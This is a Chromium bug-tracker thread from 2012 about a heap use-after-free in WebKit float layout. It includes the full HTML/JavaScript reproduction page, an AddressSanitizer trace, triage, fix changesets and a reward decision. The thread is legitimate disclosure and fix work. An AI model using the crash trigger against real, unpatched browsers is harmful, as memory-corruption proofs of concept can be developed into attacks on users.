
Issue metadata

Status: Fixed
Closed: Apr 2012
OS: All
Pri: 1
Type: Bug-Security


Issue 121899: Security: use-after-free in WebCore::RenderBoxModelObject::hasSelfPaintingLayer()

Reported by miau...@gmail.com, Apr 4 2012

Issue description

VULNERABILITY DETAILS
use-after-free in WebCore::RenderBoxModelObject::hasSelfPaintingLayer()

VERSION
Chrome Version: dev

Chromium: 20.0.1092.0 (Developer Build 130586)
OS: Linux
WebKit: 536.6 (@113153)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        float: left;                    /* #el0 is the floating renderer that gets freed */
      }
      #el1 {
        padding-top: 1em;
        padding-bottom: 1em;
        margin-bottom: 1em;
        display: table;
        -webkit-margin-before: -100px;  /* pull the table block up into the float's area */
      }
    </style>
    <script>
      onload = function() {
        document.body.appendChild(document.createElement('select'));
        el0 = document.createElement('hr');
        el0.setAttribute('id', 'el0');
        document.body.appendChild(el0);
        el1 = document.createElement('div');
        el1.setAttribute('id', 'el1');
        document.body.appendChild(el1);
        el1.appendChild(document.createElement('textarea'));
        el2 = document.createElement('div');
        document.body.appendChild(el2);
        el2.appendChild(document.createElement('input'));
        document.body.offsetTop;         // force a synchronous layout with the float in place
        document.body.removeChild(el0);  // detach the float; a later layout pass still reaches its freed renderer
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==28339== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca3eeb8 at pc 0x55555ab913d7 bp 0x7fffffff74a0 sp 0x7fffffff7498
READ of size 8 at 0x7fffeca3eeb8 thread T0
    #0 0x55555ab913d7 in WebCore::RenderBoxModelObject::hasSelfPaintingLayer() const ???:0
    #1 0x55555aab07f4 in WebCore::RenderBlock::addOverhangingFloats(WebCore::RenderBlock*, bool) ???:0

0x7fffeca3eeb8 is located 56 bytes inside of 184-byte region [0x7fffeca3ee80,0x7fffeca3ef38)
freed by thread T0 here:
    #0 0x55555df1f772 in free ??:0
    #1 0x5555592c5e47 in WebCore::Node::detach() ???:0
    #2 0x55555928989d in WebCore::Element::detach() ???:0
 
Attachments: 56184.html (924 bytes), 56184.txt (10.2 KB)

Comment 1 by infe...@chromium.org, Apr 4 2012

Comment 2 by palmer@chromium.org, Apr 4 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Mstone-20 SecImpacts-None SecSeverity-High OS-All
Status: Assigned
Ken, can I therefore assign it to you? :) Feel free to punt it right back to me.

I can only repro it on ToT, not 18. It might yet turn out to work on 19, though; I'll try.

Comment 3 by palmer@chromium.org, Apr 4 2012

Owner: kenrb@chromium.org

Comment 4 by kenrb@chromium.org, Apr 4 2012

Another float issue... leave it with me and I'll put it in my queue. I just uploaded to cluster-fuzz to see if we can get a regression range. Crossing my fingers I didn't cause it (which is probably about even odds based on reading the test case).

Comment 5 by kenrb@chromium.org, Apr 4 2012

It's not my regression, but cluster-fuzz isn't reproducing. It might be a special case of the same bug in 106413 that my patch doesn't catch for some reason. I'll have a closer look later on.

Comment 6 by infe...@chromium.org, Apr 5 2012

Owner: infe...@chromium.org
Status: Started
I know what is going wrong with floats here.. stealing... :)

Comment 7 by infe...@chromium.org, Apr 9 2012

Labels: -Mstone-20 -SecImpacts-None Mstone-18 SecImpacts-Stable SecImpacts-Beta
Chris, this easily reproduces under ASAN on m18. We should always try with the memory debugging tool; or, under Chrome without ASAN, please use the --js-flags="--expose-gc" flag to force gc.

Comment 8 by infe...@chromium.org, Apr 11 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/113825

Comment 9 by scarybea...@gmail.com, Apr 23 2012

Labels: -Merge-Approved Merge-Merged reward-topanel
M18: http://trac.webkit.org/changeset/114948
M19: http://trac.webkit.org/changeset/114949

Comment 10 by infe...@chromium.org, Apr 24 2012

Labels: -reward-topanel reward-1000 reward-unpaid
Thanks, Miaubiz, for helping to cleanse the float bugs. They are nasty. This qualifies for a $1000 Chromium Security Reward.

Comment 11 by infe...@chromium.org, Apr 24 2012

Labels: CVE-2011-3081

Comment 12 by scarybea...@gmail.com, May 10 2012

Labels: -reward-unpaid

Comment 13 by cdn@chromium.org, May 15 2012

Status: Fixed
Marking old security bugs Fixed..

Comment 14 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 15 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -Mstone-18 -SecImpacts-Stable -SecSeverity-High -SecImpacts-Beta Cr-Content Security-Impact-Stable Security-Impact-Beta M-18 Security-Severity-High Type-Bug-Security

Comment 16 by bugdroid1@chromium.org, Mar 13 2013

Project Member
Labels: Restrict-View-EditIssue

Comment 17 by bugdroid1@chromium.org, Mar 13 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 18 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 19 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 22 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 23 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 24 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 25 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 26 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 27 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
